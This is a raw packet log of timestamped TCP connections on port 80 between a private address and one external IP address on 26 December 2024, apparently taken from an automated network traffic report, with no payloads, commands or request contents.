                                                                                                                          Dec 26, 2024 22:32:39.150703907 CET4974980192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:40.099612951 CET804975137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:40.289383888 CET4975180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:40.351991892 CET804975137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:40.414319992 CET4975180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:40.856573105 CET4975180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:40.857284069 CET4975280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:40.976769924 CET804975137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:40.976824045 CET4975180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:40.976876020 CET804975237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:40.977027893 CET4975280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:40.977175951 CET4975280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:41.096648932 CET804975237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:41.336354017 CET4975280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:41.456182003 CET804975237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:41.456202030 CET804975237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:41.456217051 CET804975237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:42.165239096 CET4975280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:42.191359043 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:42.285357952 CET804975237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:42.285517931 CET4975280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:42.310936928 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:42.311074972 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:42.311273098 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:42.392890930 CET4975480192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:42.430751085 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:42.512603045 CET804975437.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:42.512713909 CET4975480192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:42.512830019 CET4975480192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:42.632333040 CET804975437.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:42.664716005 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:42.784531116 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:42.784545898 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:42.784619093 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:42.784622908 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:42.784634113 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:42.784698009 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:42.784698963 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:42.784709930 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:42.784774065 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:42.784816980 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:42.784827948 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:42.784859896 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:42.784878016 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:42.784893036 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:42.784931898 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:42.867686033 CET4975480192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:42.904444933 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:42.904460907 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:42.904485941 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:42.904544115 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:42.904645920 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:42.904664040 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:42.904689074 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:42.904716969 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:42.945486069 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:42.945590973 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:43.023814917 CET804975437.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.023833990 CET804975437.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.023845911 CET804975437.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.065354109 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.065448999 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:43.109627962 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.229782104 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.233051062 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:43.368521929 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.371103048 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:43.371237993 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:43.491035938 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.491050005 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.491137028 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:43.491154909 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.491167068 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.491200924 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.491205931 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:43.491211891 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.491266012 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:43.491287947 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.491297960 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.491345882 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:43.491415024 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.491527081 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:43.491580963 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.491600037 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.491620064 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:43.491657972 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:43.491674900 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.491739988 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:43.491769075 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.491854906 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:43.491956949 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.492010117 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:43.492124081 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.492209911 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:43.492223978 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.492288113 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:43.492367983 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.492425919 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:43.492466927 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.492536068 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:43.492681980 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.492836952 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.492872953 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:43.492908001 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:43.492930889 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.492994070 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:43.493021965 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.493158102 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.493217945 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:43.493282080 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.493334055 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.493359089 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:43.493398905 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:43.493454933 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.493509054 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:43.493570089 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.493649006 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:43.493670940 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.493716002 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.493735075 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:43.493769884 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:43.493812084 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.493868113 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:43.537436962 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.537493944 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:43.610835075 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.610884905 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.610960007 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:43.610972881 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.611069918 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.611124992 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:43.611238956 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.611295938 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.611371994 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.611383915 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:43.611433029 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.611548901 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.611691952 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.611732960 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.611862898 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.611915112 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.612020016 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.612111092 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.612255096 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.612270117 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.612402916 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.612482071 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.612605095 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.612692118 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.612899065 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.612910032 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.613159895 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.613224030 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.613440990 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.613451958 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.613523006 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.613533020 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.613574982 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.613584995 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.613683939 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.613696098 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.613761902 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.613771915 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.613802910 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.613812923 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.613953114 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.613962889 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.613971949 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.613981962 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.613995075 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.614031076 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.614121914 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.614130974 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.614200115 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.614273071 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.614283085 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.614305019 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.614439011 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.614459038 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.614531994 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.614542961 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.614578962 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.657058954 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.673618078 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:43.789397001 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:43.984973907 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:44.188940048 CET804975437.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:44.188961983 CET804975437.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:44.188976049 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:44.188986063 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:44.188998938 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:44.189019918 CET4975480192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:44.189084053 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:44.189105034 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:44.189107895 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:44.189240932 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:44.189251900 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:44.320600033 CET4975480192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:44.322355986 CET4975580192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:44.441360950 CET804975437.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:44.441420078 CET4975480192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:44.443329096 CET804975537.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:44.443413019 CET4975580192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:44.443595886 CET4975580192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:44.565134048 CET804975537.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:44.789520979 CET4975580192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:44.909347057 CET804975537.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:44.909359932 CET804975537.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:44.909369946 CET804975537.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:45.044975996 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:45.045382023 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:45.165105104 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:45.399439096 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:45.470881939 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:45.520061016 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:45.520339012 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:45.680041075 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:45.807883024 CET804975537.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:46.023765087 CET4975580192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:46.059945107 CET804975537.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:46.133150101 CET4975580192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:46.200611115 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:46.205553055 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:46.205630064 CET4975580192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:46.325661898 CET804975337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:46.325716972 CET4975380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:46.326077938 CET804975537.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:46.328485966 CET4975580192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:46.341010094 CET4975680192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:46.461464882 CET804975637.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:46.461561918 CET4975680192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:46.463331938 CET4975680192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:46.583368063 CET804975637.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:46.820910931 CET4975680192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:46.946784019 CET804975637.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:46.946796894 CET804975637.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:46.946902990 CET804975637.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:47.824851990 CET804975637.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:47.891938925 CET4975680192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:48.185623884 CET804975637.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:48.289390087 CET4975680192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:48.302468061 CET4975680192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:48.303174019 CET4975780192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:48.422844887 CET804975637.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:48.422864914 CET804975737.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:48.422918081 CET4975680192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:48.422954082 CET4975780192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:48.423146009 CET4975780192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:48.543000937 CET804975737.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:48.774255991 CET4975780192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:48.894258022 CET804975737.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:48.894272089 CET804975737.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:48.894280910 CET804975737.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:49.786189079 CET804975737.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:49.930022001 CET4975780192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:50.040679932 CET804975737.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:50.133194923 CET4975780192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:50.162868977 CET4975880192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:50.285799026 CET804975837.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:50.285882950 CET4975880192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:50.286061049 CET4975880192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:50.410087109 CET804975837.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:50.633666039 CET4975880192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:50.754914999 CET804975837.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:50.754930019 CET804975837.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:50.754937887 CET804975837.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:51.213342905 CET4975880192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:51.213785887 CET4975980192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:51.333092928 CET4976080192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:51.334232092 CET804975937.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:51.334319115 CET4975980192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:51.334424019 CET4975980192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:51.377252102 CET804975837.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:51.456494093 CET804976037.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:51.456578970 CET4976080192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:51.456897974 CET4976080192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:51.458347082 CET804975937.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:51.468720913 CET804975837.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:51.468832970 CET4975880192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:51.576582909 CET804976037.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:51.685851097 CET4975980192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:51.805666924 CET804975937.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:51.805680037 CET804975937.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:51.810715914 CET4976080192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:51.931138039 CET804976037.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:51.931149960 CET804976037.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:51.931158066 CET804976037.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:52.705739021 CET804975937.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:52.789423943 CET4975980192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:52.819610119 CET804976037.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:52.940164089 CET4976080192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:52.957115889 CET804975937.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:53.072316885 CET804976037.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:53.086297989 CET4975980192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:53.191564083 CET4975780192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:53.196158886 CET4975980192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:53.196414948 CET4976080192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:53.197319031 CET4976180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:53.316029072 CET804975937.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:53.316121101 CET4975980192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:53.316701889 CET804976037.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:53.316761017 CET4976080192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:53.316823959 CET804976137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:53.316919088 CET4976180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:53.317014933 CET4976180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:53.437603951 CET804976137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:53.664505959 CET4976180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:53.784254074 CET804976137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:53.784266949 CET804976137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:53.784316063 CET804976137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:54.710634947 CET804976137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:54.930485010 CET4976180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:54.964148998 CET804976137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:55.085834026 CET4976280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:55.133167028 CET4976180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:55.205864906 CET804976237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:55.205952883 CET4976280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:55.206276894 CET4976280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:55.331219912 CET804976237.44.238.250192.168.2.4
